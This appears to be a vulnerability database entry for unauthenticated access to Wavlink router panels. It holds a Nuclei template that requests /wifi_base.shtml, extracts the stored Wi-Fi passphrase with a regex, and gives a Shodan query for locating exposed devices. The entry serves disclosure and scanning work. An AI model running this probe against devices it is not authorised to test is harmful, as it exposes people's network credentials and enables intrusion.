unauth-wavink-panel: Wavlink Panel - Unauthenticated Access

日期: 2025-08-01 | 影响软件: Wavlink Panel | POC: 已公开

漏洞描述

Wavlink Panel was able to be accessed with no authentication requirements in place.

PoC代码[已公开]

id: unauth-wavink-panel

info:
  name: Wavlink Panel - Unauthenticated Access
  author: princechaddha
  severity: high
  description: Wavlink Panel was able to be accessed with no authentication requirements in place.
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Wi-Fi APP Login"
  tags: exposure,wavlink,unauth,misconfig,router,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wifi_base.shtml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>APP</title>"

      - type: regex
        part: body
        regex:
          - 'var passphraseKey12="(.*)";'

      - type: word
        part: body
        negative: true
        words:
          - 'var passphraseKey12="";'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'var passphraseKey12="(.*)";'
# digest: 490a0046304402202531afad3f3174b3090147ea3c6993a0c5a71939380d670e7d82ec9b0d75736702203199402b189d6b242b2bccc09bf83a8fd402404ea45cebde27d113c41deb37c7:922c64590222798bb761d5b6d8e72950